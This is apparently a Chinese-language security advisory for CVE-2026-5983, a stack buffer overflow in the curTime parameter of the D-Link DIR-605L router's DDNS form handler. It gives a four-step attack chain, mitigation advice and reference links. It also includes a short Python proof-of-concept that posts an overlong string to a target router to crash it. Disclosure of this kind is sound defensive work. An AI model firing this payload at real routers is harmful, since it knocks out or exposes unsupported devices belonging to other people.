CVE-2026-5983 D-Link DIR-605L 缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-5983

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-605L

漏洞概述

D-Link DIR-605L路由器固件版本2.13B01存在严重的缓冲区溢出漏洞。该漏洞源于/goform/formSetDDNS接口对POST请求参数curTime缺乏严格的边界检查。远程攻击者无需用户交互，仅需构造包含超长恶意数据的HTTP POST请求即可触发溢出。由于该产品已停止官方支持，此漏洞可能导致设备完全被控制，造成严重的安全风险。

技术细节

该漏洞的根源在于D-Link DIR-605L固件中处理DDNS配置更新的CGI程序存在典型的栈缓冲区溢出缺陷。当攻击者向'/goform/formSetDDNS'端点发送POST请求时，程序提取了'curTime'参数，并使用不安全的内存拷贝操作（例如未进行长度检查的strcpy或sprintf函数）将其写入栈上的局部变量缓冲区。由于该缓冲区大小有限，当传入的'curTime'字符串长度超过缓冲区容量时，多余的数据将溢出并覆盖相邻的栈帧数据，包括基指针（EBP）和返回地址。CVSS向量显示攻击复杂度低且无需用户交互，意味着攻击者可以轻易地通过网络发送特制的数据包。一旦成功覆盖返回地址并将其指向恶意代码（Shellcode），攻击者即可劫持程序的执行流，获取系统的最高权限，进而植入后门、窃取敏感数据或发动进一步的网络攻击。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别在线的D-Link DIR-605L设备，并确认其运行在受影响的固件版本2.13B01上。

STEP 2

漏洞利用

攻击者向目标设备的/goform/formSetDDNS接口发送特制的HTTP POST请求，其中包含超长的'curTime'参数。

STEP 3

溢出触发

设备处理请求时，由于未检查长度，'curTime'数据覆盖栈上的返回地址，导致缓冲区溢出。

STEP 4

代码执行

程序流程被劫持，跳转到攻击者注入的恶意代码，导致远程代码执行（RCE），攻击者获得设备控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_ip):
    """
    Proof of Concept for CVE-2026-5983
    This script sends a malicious POST request to trigger the buffer overflow.
    """
    target_url = f"http://{target_ip}/goform/formSetDDNS"
    # The 'curTime' parameter is vulnerable.
    # Sending a long string to overwrite the return address on the stack.
    # Adjust the length based on specific buffer size analysis.
    payload_data = {
        "curTime": "A" * 1000  
    }
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (compatible; ExploitBot/1.0)"
    }

    try:
        print(f"[+] Sending payload to {target_url}...")
        response = requests.post(target_url, data=payload_data, headers=headers, timeout=5)
        print(f"[+] Response status code: {response.status_code}")
        if response.status_code != 200:
            print("[!] Target may have crashed or service disrupted.")
        else:
            print("[!] Request sent, check device status for crash.")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python exploit.py <target_ip>")
    else:
        exploit_poc(sys.argv[1])

影响范围

D-Link DIR-605L 2.13B01

防御指南

临时缓解措施

由于该产品已不再受官方支持且厂商不会发布补丁，建议立即停止使用该设备并更换为支持现代安全协议的新型路由器。若暂时无法更换，务必禁用路由器的远程管理功能，并通过访问控制列表（ACL）严格限制局域网内对管理界面的访问，同时密切监控网络流量以检测潜在的利用行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5983
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5983
3 Details https://www.cvedetails.com/cve/CVE-2026-5983/
4 VulDB https://vuldb.com/cve/CVE-2026-5983
5 Link https://lavender-bicycle-a5a.notion.site/D-Link-DIR-605L-formSetDDNS-33153a41781f802f9997f48dc9cf6304?source=copy_link
6 Link https://vuldb.com/submit/791856
7 Link https://vuldb.com/vuln/356537
8 Link https://vuldb.com/vuln/356537/cti
9 Link https://www.dlink.com/